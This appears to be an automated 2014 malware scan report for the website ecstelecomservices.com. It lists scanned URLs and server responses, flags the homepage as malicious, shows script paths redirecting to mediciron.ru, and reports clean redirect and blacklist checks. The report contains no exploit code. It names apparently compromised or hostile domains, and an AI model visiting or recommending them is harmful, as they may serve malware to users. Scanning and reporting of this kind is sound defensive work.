Scanned pages/files
Request | Server response | Status |
http://ecstelecomservices.com/ | 200 OK Content-Length: 7669 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://ecstelecomservices.com/test404page.js | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Sun, 31 Aug 2014 15:47:21 GMT Accept-Ranges: bytes Age: 0 Location: http://mediciron.ru/ Server: Apache/2 Content-Length: 204 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 31 Aug 2014 16:47:21 GMT | clean |
http://mediciron.ru/ | 200 OK Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru/modernizr.js | 200 OK Content-Length: 6296 Content-Type: application/javascript | clean |
http://ecstelecomservices.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Sun, 31 Aug 2014 15:47:23 GMT Accept-Ranges: bytes Age: 0 Location: http://mediciron.ru/ Server: Apache/2 Content-Length: 204 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 31 Aug 2014 16:47:23 GMT | clean |
http://mediciron.ru/test404page.js | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/ | 404 Not Found Content-Length: 34894 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecstelecomservices.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 31 Aug 2014 15:47:20 GMT
Accept-Ranges: bytes
Age: 319
ETag: "1df5-4e7ecfc1302d4"
Server: Apache/2
Content-Length: 7669
Content-Type: text/html
Expires: Sun, 31 Aug 2014 16:42:01 GMT
Last-Modified: Fri, 04 Oct 2013 16:42:14 GMT
...7669 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecstelecomservices.com
Referer: http://www.google.com/search?q=ecstelecomservices.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecstelecomservices.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ecstelecomservices.com/
Result: ecstelecomservices.com is not infected or malware details are not published yet.